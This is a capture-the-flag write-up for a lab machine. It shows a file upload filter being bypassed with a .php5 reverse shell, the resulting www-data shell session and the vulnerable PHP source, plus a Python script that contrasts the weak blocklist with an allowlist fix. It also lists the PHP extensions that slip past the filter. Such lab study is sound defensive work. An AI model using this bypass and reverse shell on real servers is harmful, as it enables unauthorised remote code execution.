Arbitrary File Upload / RCE


I had already uploaded the PHP reverse-shell payload under several different extensions to probe the upload filter, then requested each copy from the uploads directory:

┌──(kali㉿kali)-[~/archive/thm/rootme]
└─$ curl http://$IP/uploads/shell.php5              

Most of the variants were either rejected by the filter or not executed by the server, but .php5 was both accepted and executed: requesting it triggered the reverse shell on my listener.

┌──(kali㉿kali)-[~/archive/thm/rootme]
└─$ nnc 9999                
listening on [any] 9999 ...
connect to [10.9.2.95] from (UNKNOWN) [10.10.183.226] 36296
whoami
www-data
hostname
rootme
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc fq_codel state UP group default qlen 1000
    link/ether 02:20:67:44:9c:e1 brd ff:ff:ff:ff:ff:ff
    inet 10.10.183.226/16 brd 10.10.255.255 scope global dynamic eth0
       valid_lft 2115sec preferred_lft 2115sec
    inet6 fe80::20:67ff:fe44:9ce1/64 scope link
       valid_lft forever preferred_lft forever

Initial foothold established on the target as the www-data account via an arbitrary file upload leading to remote code execution.

Why did it work?


$ cat index.php
<?php
session_start();
// The admin session check is commented out, so the upload form is reachable unauthenticated.
// if (!isset($_SESSION['admin'])){
//     header('Location: ../admin');
// }
 
$uploadOk = 2;
 
if (isset($_POST["submit"])){
    $target_dir = "../uploads/";
    // basename() strips any directory component, so there is no path traversal here.
    $target_file = $target_dir . basename($_FILES["fileUpload"]["name"]);
    // Only the final extension is inspected, lowercased, and compared against one literal string.
    $file_filetype = strtolower(pathinfo($target_file,PATHINFO_EXTENSION));
 
    // Blocklist of a single value: "php5", "phtml", "pht", "php3" etc. all pass.
    if ($file_filetype == "php"){
        $result = "PHP não é permitido!"; // "PHP is not allowed!"
        $uploadOk = 0;
    } else {
        // Logic bug: file_exists() only sets a flag; the move below still runs and overwrites the existing file.
        if (file_exists($target_file)){
            $result = "O arquivo já existe."; // "The file already exists."
            $uploadOk = 0;
        }
        if (move_uploaded_file($_FILES["fileUpload"]["tmp_name"], $target_file)) {
            $result = "O arquivo foi upado com sucesso!"; // "The file was uploaded successfully!"
            $uploadOk = 1;
            // The CTF hint: the alternative PHP extensions the filter does not block.
            // if ($file_filetype == "php1" || $file_filetype == "php2" || $file_filetype == "php3" || $file_filetype == "php4" || $file_filetype == "php5" || $file_filetype == "php6" || $file_filetype == "php7" || $file_filetype == "php8" || $file_filetype == "php9"){
            //     $result = "hackIT{uplo4d_f1l3_byp4ss}";;
            // }
        } else {
            $result = "Erro enviando o arquivo!"; // "Error sending the file!"
            $uploadOk = 0;
        }
    }
}
?>
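The filter rejects only the literal extension "php"; whether an alternative extension then executes is decided by the web server's handler mapping, not by the application. On older Debian/Ubuntu php-apache packages that mapping is a FilesMatch pattern of the form `.+\.ph(p[3457]?|t|tml)$`, which is why .php5 runs (the exact pattern on the RootMe box is an assumption here, inferred from .php5 executing). The script below is an added example, not code from the writeup or from the target: it mirrors the target's check, models that handler pattern, and shows an allowlist-based replacement. The candidate filename list is constructed for the demonstration and is not the exact set I tried.

```python
import os
import re

# Constructed list of candidate filenames for a probe run (an assumption; the
# writeup does not list exactly which extensions were tried).
CANDIDATES = [
    "shell.php", "shell.PHP", "shell.php3", "shell.php4", "shell.php5",
    "shell.php7", "shell.pht", "shell.phtml", "shell.php.jpg",
    "shell.jpg.php", "shell.jpg", "shell.txt",
]

# FilesMatch pattern from older Debian/Ubuntu php*-apache2 packages (assumed to
# be what the target runs, since .php5 executed there). Newer packages ship
# ".+\.ph(ar|p|tml)$", which drops php[3457] but adds phar.
APACHE_PHP_HANDLER = re.compile(r".+\.ph(p[3457]?|t|tml)$")

ALLOWED_IMAGE_EXTS = {"jpg", "jpeg", "png", "gif"}


def weak_filter_accepts(filename: str) -> bool:
    """Mirror of the target's check: basename(), lowercase the last extension,
    reject only when it is exactly 'php'."""
    base = os.path.basename(filename)
    ext = os.path.splitext(base)[1].lstrip(".").lower()
    return ext != "php"


def apache_executes(filename: str) -> bool:
    """Would Apache hand this filename to the PHP handler under the pattern above?
    FilesMatch is case-sensitive, so 'shell.PHP' does not match here."""
    return APACHE_PHP_HANDLER.match(os.path.basename(filename)) is not None


def hardened_accepts(filename: str) -> bool:
    """Allowlist instead of blocklist: exactly one extension, and it must be an
    image type. In a real fix also verify magic bytes, generate the stored name
    server-side and keep uploads in a directory the web server will not execute."""
    base = os.path.basename(filename)
    parts = base.split(".")
    if len(parts) != 2 or not parts[0]:
        return False  # rejects double extensions, dotfiles and bare names
    return parts[1].lower() in ALLOWED_IMAGE_EXTS


def bypasses(candidates=CANDIDATES):
    """Names the weak filter accepts that the PHP handler would still execute."""
    return [n for n in candidates if weak_filter_accepts(n) and apache_executes(n)]


if __name__ == "__main__":
    print(f"{'filename':16} {'weak filter':12} {'executes':9} {'hardened':8}")
    for name in CANDIDATES:
        print(f"{name:16} {weak_filter_accepts(name)!s:12} "
              f"{apache_executes(name)!s:9} {hardened_accepts(name)!s:8}")
    print("bypass candidates:", bypasses())
```

Running it lists .php3, .php4, .php5, .php7, .pht and .phtml as names that pass the blocklist and still reach the PHP handler, while shell.php.jpg passes the filter but is not executed under this pattern (a server using AddHandler with mod_mime multiple-extension handling would behave differently). The hardened check rejects every one of those, and it also closes the file_exists() overwrite bug's usefulness to an attacker only if combined with a server-generated filename.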